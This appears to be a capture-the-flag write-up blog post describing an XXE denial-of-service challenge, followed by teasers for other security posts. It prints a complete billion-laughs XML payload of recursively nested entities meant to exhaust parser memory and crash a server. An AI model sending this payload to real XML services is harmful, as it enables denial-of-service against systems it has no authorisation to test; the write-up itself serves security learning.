This challenge was the usual XXE attack called entity injection with the goal to crash the server. This reminded me of the old but good billion laughs attack. With this attack, your recursive include entities which include further entities to overload the RAM of the XML parser and crash the program.
To execute the attack we first have to create an XML file with the correct schema they provided us. It looked like the following:
<note>
<to>Peter</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>refid="note"Don't forget me this weekend!</body>
</note>
After that, we had to insert the entities to bring the parser to its knees.
And we are done!
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<note>
<to>&lol9;</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>refid="note"Don't forget me this weekend!</body>
</note>
Weitere Posts zum Thema Web-Security und Penetration-Testing
WEB100 – XXE Denial of Service
This challenge was the usual XXE attack called entity injection with the goal to crash the server. This reminded me of the old but good billion laughs attack. With this attack, your recursive include entities which include further entities to overload the RAM of the XML parser and crash the program.To execute the attack we…
WEB200 – The rocket clock
This challenge was a web challenge. A PHP code to inspect and to tell what’s the problem with it and then exploit the weakness in the servers running this application. At first, I tried to take a look at the input which is controlled by the user. This is where we can manipulate and send…
Penetration Test Report ISIS12
Dieser Penetration Test wurde durchgeführt von Patrick Eisenschmidt. Inhaltsverzeichnis Timeline Dokumentenversion 1. Einführung 2. Technische Umgebung und Randbedingungen 3. Kategorisierung der Schwachstellen 4. Findings 4.1. XSS (Cross Site Scripting) 4.2. Benutzung eines schwachen Algorithmus zur Berechnung von Kennwort-Hashes Timeline Zeit Beschreibung 08.01.2019 Bericht an den Ansprechpartner der Hochschule gesendet 09.01.2019 Bericht wurde an den Hersteller…
NET100 – Perfect hit
This was a quite easy but fun challenge.It’s about extracting data from a pcap file with SIP communication captured. If we take a look at the .pcap we see some SIP communication which can be easily inspected via the setting “Telephonie” in Wireshark. With that, we can see that there are two calls and one…
MSC100 – Base32
MSC100 – Base32 This one was harder for me. Made some bad mistakes at the beginning which really left me clueless. The description was that someone encrypted text with base32 but did something wrong. So I tried to decrypt it with some online decoders but they all went crazy because of characters which are not…
CRY100 – Decrypt this text
This challenges is about decrypting the text inside a file. At first, it does not pretty good. Most characters are not printable or just jibberish.Sadly I can’t remember correctly what the description said (have to write it down next time) but I guess something about the text is XOR’d and the key has to be…
Untersuchung der Kommunikation der App UniNow
Die Kommunikation der App UniNow wurde von Patrick Eisenschmidt auf personenbezogenen / datenschutzrelevante Daten geprüft. Dein ganzes Studium immer dabei. Mit UniNow hast du alle wichtigen Informationen rund um dein Studium in nur einer App! Egal ob Noten, deine Mails oder deinen Stundenplan – du hast alles immer und überall dabei! Inhaltsverzeichnis Dokumentenversion 1. Einführung…